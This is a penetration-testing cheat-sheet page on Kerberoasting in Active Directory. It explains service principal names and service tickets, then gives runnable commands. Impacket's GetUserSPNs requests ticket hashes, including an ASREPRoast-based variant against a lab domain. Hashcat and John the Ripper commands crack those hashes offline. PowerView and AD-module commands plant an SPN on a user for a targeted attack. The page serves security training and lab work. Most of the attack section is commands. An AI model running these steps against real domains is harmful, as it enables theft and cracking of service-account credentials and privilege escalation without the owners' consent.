Kerberoasting

Typically, Kerberoasting happens after compromising a domain user. However, according to new research, it is possible to perform this attack with an account susceptible to ASREPRoast! For an example of this attack vector check Rebound.

Kerberoasting is an attack on the Service Ticket (ST) and Service Principal Names (SPNs). SPNs are unique IDs that Kerberos uses to map a service instance, for example MySQL, to a service sign-in account, such as svc_mysql, in whose, often privileged, context the service is running. The ST is encrypted with the service's account NTLM hash, so it can potentially be cracked. Any domain user can request a ST from the DC for any SPN account.

Figure 1: The Kerberos authentication process (image taken from here).

Tools

Find and attack user accounts used as service accounts with Impacket:

sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 <domain>/<user> -outputfile <fileName>

# Kerberoast an account susceptible to ASREPRoasting
sudo impacket-GetUserSPNs -no-preauth jjones -usersfile domain_users -dc-host 10.10.11.231 rebound.htb/ -outputfile kerb.txt

If time sync errors occur, i.e., KRB_AP_ERR_SKEW(Clock skew too great):

sudo ntpdate <dc-ip>

The krb5tgs hashes can be cracked offline using Hashcat or JtR:

# Crack the hashes using Hashcat
sudo hashcat -m 13100 hashes.kerberoast rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

# Crack the hashes using John the Ripper
.\john.exe --wordlist=<wordlist> hashes.kerberoast

Targeted Kerberoast

If we have GenericWrite or GenericAll on a user object, we can set an SPN on that user account and then extract and crack the TGS.

Set a SPN for the target user (must be unique for the forest) using PowerView or the ActiveDirectory module:

# PowerView
Set-DomainObject -Identity <targetUser> -Set @{serviceprincipalname='<serviceName>/<randomString>'}

# AD module
Set-ADUser -Identity <targetUser> -ServicePrincipalNames @{Add='<serviceName>/<randomString>'}

Resources

  • An amazing demonstration of Kerberoasting (video)

  • What impacket-GetUserSPNs does behind the scenes (video)

  • Siegecast's lecture on Kerberoasting (video)

  • An in-depth adsecurity article about Kerberoasting (article)

Last updated

Was this helpful?